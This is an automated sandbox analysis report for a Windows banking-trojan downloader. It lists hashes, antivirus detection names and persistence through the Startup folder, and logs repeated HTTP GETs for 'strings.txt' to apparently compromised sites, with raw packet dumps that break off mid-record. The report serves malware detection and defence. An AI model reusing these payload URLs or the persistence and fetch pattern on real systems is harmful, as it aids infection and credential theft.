Analysis Date2015-01-23 21:41:11
MD50c28a2463d78f17d44731c15db592ddf
SHA1bc2dcd86c03b9729d128e3c9de0544a4005626af

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Language040904B0 
Section.text md5: 90bb76c0d8a6939dd095bfee91abef6f sha1: 35deddaddfa1c82786aef4b9be058a2ba47065c8 size: 327680
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 4db6113514893db9f181e45903c3757f sha1: 668884cc8b42fd011dcd6d17b32f212613e045b9 size: 28672
Timestamp2014-07-02 01:33:18
VersionInternalName: qsxnxy
FileVersion: 1.00
CompanyName: sony
ProductName: rwpxvu
ProductVersion: 1.00
OriginalFilename: svyzrx.exe
PackerMicrosoft Visual Basic v5.0
PEhash21e3b05e19ee63a730c7dc76df9b8ab320983708
IMPhash124b33e006c9ae89cb73e633a7c49d04
AV360 Safeno_virus
AVAd-AwareGen:Variant.Graftor.142666
AVAlwil (avast)VB-AIVR [Trj]
AVArcabit (arcavir)Gen:Variant.Graftor.142666
AVAuthentiumW32/A-6dc01e27!Eldorado
AVAvira (antivir)BDS/Simda.aomenoa
AVBullGuardGen:Variant.Graftor.142666
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Cossta.r3
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.20021
AVEmsisoftGen:Variant.Graftor.142666
AVEset (nod32)Win32/Spy.Bancos.ACM
AVFortinetW32/Bancos.ACMB!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Graftor.142666
AVGrisoft (avg)PSW.Banker6.BNBO
AVIkarusTrojan.Win32.Cossta
AVK7Unwanted-Program ( 004a8e8a1 )
AVKasperskyTrojan.Win32.Cossta.acwf
AVMalwareBytesno_virus
AVMcafeePWS-FBXN!0C28A2463D78
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Tasekjom.A
AVMicroWorld (escan)Gen:Variant.Graftor.142666
AVRisingTrojan.VBInject!48DD
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)TScope.Trojan.VB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\bc2dcd86c03b9729d128e3c9de0544a4005626af
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DFB9AA.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\strings.txt
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Deletes FileC:\strings.txt
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.pcbonto.hu
Winsock DNScpl.yonsei.ac.kr
Winsock DNSwww.vubp.cz
Winsock DNSwww.aviafilm.com.ua
Winsock DNSgetmoresitetraffic.com
Winsock DNSwww.vulcanusalumni.net
Winsock DNSwww.artemon.cz
Winsock DNStamilcinemax.net
Winsock DNSdasan.sejong.ac.kr
Winsock DNSwww.unser-mittelhessen.de

Network Details:

DNSpcbonto.hu
Type: A
195.70.36.61
DNStamilcinemax.net
Type: A
185.53.179.6
DNSwww.aviafilm.com.ua
Type: A
91.203.4.62
DNSvubp.cz
Type: A
193.165.164.5
DNSartew.artemon.cz
Type: A
81.19.9.10
DNSvulcanusalumni.net
Type: A
213.186.33.16
DNSdasan.sejong.ac.kr
Type: A
210.107.239.150
DNSwww.unser-mittelhessen.de
Type: A
85.214.252.31
DNSgetmoresitetraffic.com
Type: A
204.197.246.18
DNScpl.yonsei.ac.kr
Type: A
165.132.228.113
DNSwww.pcbonto.hu
Type: A
DNSwww.vubp.cz
Type: A
DNSwww.artemon.cz
Type: A
DNSwww.vulcanusalumni.net
Type: A
HTTP GEThttp://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://tamilcinemax.net/js/info/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.aviafilm.com.ua/forum/files/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.vubp.cz/includes/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.artemon.cz/dov/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://dasan.sejong.ac.kr/~appmath/test/bbs/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.unser-mittelhessen.de/eventbilder/gross/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://getmoresitetraffic.com/cache/forums/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://cpl.yonsei.ac.kr/bbs/icon/private_icon/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://tamilcinemax.net/js/info/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.aviafilm.com.ua/forum/files/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.vubp.cz/includes/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.artemon.cz/dov/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.vulcanusalumni.net/templates/css/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.pcbonto.hu/portal/actions/admin/perm/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://dasan.sejong.ac.kr/~appmath/test/bbs/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://www.unser-mittelhessen.de/eventbilder/gross/.../strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://getmoresitetraffic.com/cache/forums/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
HTTP GEThttp://cpl.yonsei.ac.kr/bbs/icon/private_icon/strings.txt
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Flows TCP192.168.1.1:1031 ➝ 195.70.36.61:80
Flows TCP192.168.1.1:1032 ➝ 185.53.179.6:80
Flows TCP192.168.1.1:1033 ➝ 91.203.4.62:80
Flows TCP192.168.1.1:1034 ➝ 193.165.164.5:80
Flows TCP192.168.1.1:1035 ➝ 81.19.9.10:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.16:80
Flows TCP192.168.1.1:1037 ➝ 195.70.36.61:80
Flows TCP192.168.1.1:1038 ➝ 210.107.239.150:80
Flows TCP192.168.1.1:1039 ➝ 85.214.252.31:80
Flows TCP192.168.1.1:1040 ➝ 204.197.246.18:80
Flows TCP192.168.1.1:1041 ➝ 165.132.228.113:80
Flows TCP192.168.1.1:1042 ➝ 213.186.33.16:80
Flows TCP192.168.1.1:1043 ➝ 185.53.179.6:80
Flows TCP192.168.1.1:1044 ➝ 91.203.4.62:80
Flows TCP192.168.1.1:1045 ➝ 193.165.164.5:80
Flows TCP192.168.1.1:1046 ➝ 81.19.9.10:80
Flows TCP192.168.1.1:1047 ➝ 213.186.33.16:80
Flows TCP192.168.1.1:1048 ➝ 195.70.36.61:80
Flows TCP192.168.1.1:1049 ➝ 210.107.239.150:80
Flows TCP192.168.1.1:1050 ➝ 85.214.252.31:80
Flows TCP192.168.1.1:1051 ➝ 204.197.246.18:80
Flows TCP192.168.1.1:1052 ➝ 165.132.228.113:80

Raw Pcap
0x00000000 (00000)   47455420 2f706f72 74616c2f 61637469   GET /portal/acti
0x00000010 (00016)   6f6e732f 61646d69 6e2f7065 726d2f2e   ons/admin/perm/.
0x00000020 (00032)   2e2e2f73 7472696e 67732e74 78742048   ../strings.txt H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000060 (00096)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000070 (00112)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000080 (00128)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000090 (00144)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x000000a0 (00160)   6f73743a 20777777 2e706362 6f6e746f   ost: www.pcbonto
0x000000b0 (00176)   2e68750d 0a436163 68652d43 6f6e7472   .hu..Cache-Contr
0x000000c0 (00192)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f6a732f 696e666f 2f737472   GET /js/info/str
0x00000010 (00016)   696e6773 2e747874 20485454 502f312e   ings.txt HTTP/1.
0x00000020 (00032)   310d0a55 7365722d 4167656e 743a2055   1..User-Agent: U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 574f5736 343b2072   NT 6.1; WOW64; r
0x00000060 (00096)   763a3130 2e302e32 29204765 636b6f2f   v:10.0.2) Gecko/
0x00000070 (00112)   32303130 30313031 20466972 65666f78   20100101 Firefox
0x00000080 (00128)   2f31302e 302e320d 0a486f73 743a2074   /10.0.2..Host: t
0x00000090 (00144)   616d696c 63696e65 6d61782e 6e65740d   amilcinemax.net.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 6f6e7472   no-cache....ontr
0x000000c0 (00192)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f666f72 756d2f66 696c6573   GET /forum/files
0x00000010 (00016)   2f2e2e2e 2f737472 696e6773 2e747874   /.../strings.txt
0x00000020 (00032)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000030 (00048)   4167656e 743a2055 7365722d 4167656e   Agent: User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x00000050 (00080)   57696e64 6f777320 4e542036 2e313b20   Windows NT 6.1; 
0x00000060 (00096)   574f5736 343b2072 763a3130 2e302e32   WOW64; rv:10.0.2
0x00000070 (00112)   29204765 636b6f2f 32303130 30313031   ) Gecko/20100101
0x00000080 (00128)   20466972 65666f78 2f31302e 302e320d    Firefox/10.0.2.
0x00000090 (00144)   0a486f73 743a2077 77772e61 76696166   .Host: www.aviaf
0x000000a0 (00160)   696c6d2e 636f6d2e 75610d0a 43616368   ilm.com.ua..Cach
0x000000b0 (00176)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000c0 (00192)   6368650d 0a0d0a63 61636865 0d0a0d0a   che....cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f696e63 6c756465 732f2e2e   GET /includes/..
0x00000010 (00016)   2e2f7374 72696e67 732e7478 74204854   ./strings.txt HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 55736572 2d416765 6e743a20   nt: User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x00000050 (00080)   646f7773 204e5420 362e313b 20574f57   dows NT 6.1; WOW
0x00000060 (00096)   36343b20 72763a31 302e302e 32292047   64; rv:10.0.2) G
0x00000070 (00112)   65636b6f 2f323031 30303130 31204669   ecko/20100101 Fi
0x00000080 (00128)   7265666f 782f3130 2e302e32 0d0a486f   refox/10.0.2..Ho
0x00000090 (00144)   73743a20 7777772e 76756270 2e637a0d   st: www.vubp.cz.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 6f2d6361   no-cache....o-ca
0x000000c0 (00192)   6368650d 0a0d0a63 61636865 0d0a0d0a   che....cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f646f76 2f737472 696e6773   GET /dov/strings
0x00000010 (00016)   2e747874 20485454 502f312e 310d0a55   .txt HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a2055 7365722d   ser-Agent: User-
0x00000030 (00048)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x00000040 (00064)   2e302028 57696e64 6f777320 4e542036   .0 (Windows NT 6
0x00000050 (00080)   2e313b20 574f5736 343b2072 763a3130   .1; WOW64; rv:10
0x00000060 (00096)   2e302e32 29204765 636b6f2f 32303130   .0.2) Gecko/2010
0x00000070 (00112)   30313031 20466972 65666f78 2f31302e   0101 Firefox/10.
0x00000080 (00128)   302e320d 0a486f73 743a2077 77772e61   0.2..Host: www.a
0x00000090 (00144)   7274656d 6f6e2e63 7a0d0a43 61636865   rtemon.cz..Cache
0x000000a0 (00160)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000b0 (00176)   68650d0a 0d0a6865 0d0a0d0a 6f2d6361   he....he....o-ca
0x000000c0 (00192)   6368650d 0a0d0a63 61636865 0d0a0d0a   che....cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f74656d 706c6174 65732f63   GET /templates/c
0x00000010 (00016)   73732f73 7472696e 67732e74 78742048   ss/strings.txt H
0x00000020 (00032)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000030 (00048)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000050 (00080)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000060 (00096)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000070 (00112)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000080 (00128)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x00000090 (00144)   6f73743a 20777777 2e76756c 63616e75   ost: www.vulcanu
0x000000a0 (00160)   73616c75 6d6e692e 6e65740d 0a436163   salumni.net..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 61636865 0d0a0d0a   ache....ache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f706f72 74616c2f 61637469   GET /portal/acti
0x00000010 (00016)   6f6e732f 61646d69 6e2f7065 726d2f2e   ons/admin/perm/.
0x00000020 (00032)   2e2e2f73 7472696e 67732e74 78742048   ../strings.txt H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000060 (00096)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000070 (00112)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000080 (00128)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000090 (00144)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x000000a0 (00160)   6f73743a 20777777 2e706362 6f6e746f   ost: www.pcbonto
0x000000b0 (00176)   2e68750d 0a436163 68652d43 6f6e7472   .hu..Cache-Contr
0x000000c0 (00192)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f7e6170 706d6174 682f7465   GET /~appmath/te
0x00000010 (00016)   73742f62 62732f73 7472696e 67732e74   st/bbs/strings.t
0x00000020 (00032)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20557365 722d4167   r-Agent: User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f352e30   ent: Mozilla/5.0
0x00000050 (00080)   20285769 6e646f77 73204e54 20362e31    (Windows NT 6.1
0x00000060 (00096)   3b20574f 5736343b 2072763a 31302e30   ; WOW64; rv:10.0
0x00000070 (00112)   2e322920 4765636b 6f2f3230 31303031   .2) Gecko/201001
0x00000080 (00128)   30312046 69726566 6f782f31 302e302e   01 Firefox/10.0.
0x00000090 (00144)   320d0a48 6f73743a 20646173 616e2e73   2..Host: dasan.s
0x000000a0 (00160)   656a6f6e 672e6163 2e6b720d 0a436163   ejong.ac.kr..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 61636865 0d0a0d0a   ache....ache....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f657665 6e746269 6c646572   GET /eventbilder
0x00000010 (00016)   2f67726f 73732f2e 2e2e2f73 7472696e   /gross/.../strin
0x00000020 (00032)   67732e74 78742048 5454502f 312e310d   gs.txt HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20557365   .User-Agent: Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f352e30 20285769 6e646f77 73204e54   /5.0 (Windows NT
0x00000060 (00096)   20362e31 3b20574f 5736343b 2072763a    6.1; WOW64; rv:
0x00000070 (00112)   31302e30 2e322920 4765636b 6f2f3230   10.0.2) Gecko/20
0x00000080 (00128)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000090 (00144)   302e302e 320d0a48 6f73743a 20777777   0.0.2..Host: www
0x000000a0 (00160)   2e756e73 65722d6d 69747465 6c686573   .unser-mittelhes
0x000000b0 (00176)   73656e2e 64650d0a 43616368 652d436f   sen.de..Cache-Co
0x000000c0 (00192)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f636163 68652f66 6f72756d   GET /cache/forum
0x00000010 (00016)   732f7374 72696e67 732e7478 74204854   s/strings.txt HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 55736572 2d416765 6e743a20   nt: User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x00000050 (00080)   646f7773 204e5420 362e313b 20574f57   dows NT 6.1; WOW
0x00000060 (00096)   36343b20 72763a31 302e302e 32292047   64; rv:10.0.2) G
0x00000070 (00112)   65636b6f 2f323031 30303130 31204669   ecko/20100101 Fi
0x00000080 (00128)   7265666f 782f3130 2e302e32 0d0a486f   refox/10.0.2..Ho
0x00000090 (00144)   73743a20 6765746d 6f726573 69746574   st: getmoresitet
0x000000a0 (00160)   72616666 69632e63 6f6d0d0a 43616368   raffic.com..Cach
0x000000b0 (00176)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000c0 (00192)   6368650d 0a0d0a6e 6f2d6361 6368650d   che....no-cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f626273 2f69636f 6e2f7072   GET /bbs/icon/pr
0x00000010 (00016)   69766174 655f6963 6f6e2f73 7472696e   ivate_icon/strin
0x00000020 (00032)   67732e74 78742048 5454502f 312e310d   gs.txt HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20557365   .User-Agent: Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f352e30 20285769 6e646f77 73204e54   /5.0 (Windows NT
0x00000060 (00096)   20362e31 3b20574f 5736343b 2072763a    6.1; WOW64; rv:
0x00000070 (00112)   31302e30 2e322920 4765636b 6f2f3230   10.0.2) Gecko/20
0x00000080 (00128)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000090 (00144)   302e302e 320d0a48 6f73743a 2063706c   0.0.2..Host: cpl
0x000000a0 (00160)   2e796f6e 7365692e 61632e6b 720d0a43   .yonsei.ac.kr..C
0x000000b0 (00176)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000c0 (00192)   2d636163 68650d0a 0d0a6361 6368650d   -cache....cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f74656d 706c6174 65732f63   GET /templates/c
0x00000010 (00016)   73732f73 7472696e 67732e74 78742048   ss/strings.txt H
0x00000020 (00032)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000030 (00048)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000050 (00080)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000060 (00096)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000070 (00112)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000080 (00128)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x00000090 (00144)   6f73743a 20777777 2e76756c 63616e75   ost: www.vulcanu
0x000000a0 (00160)   73616c75 6d6e692e 6e65740d 0a436163   salumni.net..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0d0a6361 6368650d   ache......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f6a732f 696e666f 2f737472   GET /js/info/str
0x00000010 (00016)   696e6773 2e747874 20485454 502f312e   ings.txt HTTP/1.
0x00000020 (00032)   310d0a55 7365722d 4167656e 743a2055   1..User-Agent: U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 574f5736 343b2072   NT 6.1; WOW64; r
0x00000060 (00096)   763a3130 2e302e32 29204765 636b6f2f   v:10.0.2) Gecko/
0x00000070 (00112)   32303130 30313031 20466972 65666f78   20100101 Firefox
0x00000080 (00128)   2f31302e 302e320d 0a486f73 743a2074   /10.0.2..Host: t
0x00000090 (00144)   616d696c 63696e65 6d61782e 6e65740d   amilcinemax.net.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 6e6f2d63   no-cache....no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0d0a6361 6368650d   ache......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f666f72 756d2f66 696c6573   GET /forum/files
0x00000010 (00016)   2f2e2e2e 2f737472 696e6773 2e747874   /.../strings.txt
0x00000020 (00032)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000030 (00048)   4167656e 743a2055 7365722d 4167656e   Agent: User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x00000050 (00080)   57696e64 6f777320 4e542036 2e313b20   Windows NT 6.1; 
0x00000060 (00096)   574f5736 343b2072 763a3130 2e302e32   WOW64; rv:10.0.2
0x00000070 (00112)   29204765 636b6f2f 32303130 30313031   ) Gecko/20100101
0x00000080 (00128)   20466972 65666f78 2f31302e 302e320d    Firefox/10.0.2.
0x00000090 (00144)   0a486f73 743a2077 77772e61 76696166   .Host: www.aviaf
0x000000a0 (00160)   696c6d2e 636f6d2e 75610d0a 43616368   ilm.com.ua..Cach
0x000000b0 (00176)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000c0 (00192)   6368650d 0a0d0a0a 0d0a6361 6368650d   che.......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e63 6c756465 732f2e2e   GET /includes/..
0x00000010 (00016)   2e2f7374 72696e67 732e7478 74204854   ./strings.txt HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 55736572 2d416765 6e743a20   nt: User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x00000050 (00080)   646f7773 204e5420 362e313b 20574f57   dows NT 6.1; WOW
0x00000060 (00096)   36343b20 72763a31 302e302e 32292047   64; rv:10.0.2) G
0x00000070 (00112)   65636b6f 2f323031 30303130 31204669   ecko/20100101 Fi
0x00000080 (00128)   7265666f 782f3130 2e302e32 0d0a486f   refox/10.0.2..Ho
0x00000090 (00144)   73743a20 7777772e 76756270 2e637a0d   st: www.vubp.cz.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a 6f2d6361   no-cache....o-ca
0x000000c0 (00192)   6368650d 0a0d0a0a 0d0a6361 6368650d   che.......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f646f76 2f737472 696e6773   GET /dov/strings
0x00000010 (00016)   2e747874 20485454 502f312e 310d0a55   .txt HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a2055 7365722d   ser-Agent: User-
0x00000030 (00048)   4167656e 743a204d 6f7a696c 6c612f35   Agent: Mozilla/5
0x00000040 (00064)   2e302028 57696e64 6f777320 4e542036   .0 (Windows NT 6
0x00000050 (00080)   2e313b20 574f5736 343b2072 763a3130   .1; WOW64; rv:10
0x00000060 (00096)   2e302e32 29204765 636b6f2f 32303130   .0.2) Gecko/2010
0x00000070 (00112)   30313031 20466972 65666f78 2f31302e   0101 Firefox/10.
0x00000080 (00128)   302e320d 0a486f73 743a2077 77772e61   0.2..Host: www.a
0x00000090 (00144)   7274656d 6f6e2e63 7a0d0a43 61636865   rtemon.cz..Cache
0x000000a0 (00160)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000b0 (00176)   68650d0a 0d0a6865 0d0a0d0a 6f2d6361   he....he....o-ca
0x000000c0 (00192)   6368650d 0a0d0a0a 0d0a6361 6368650d   che.......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f74656d 706c6174 65732f63   GET /templates/c
0x00000010 (00016)   73732f73 7472696e 67732e74 78742048   ss/strings.txt H
0x00000020 (00032)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000030 (00048)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000050 (00080)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
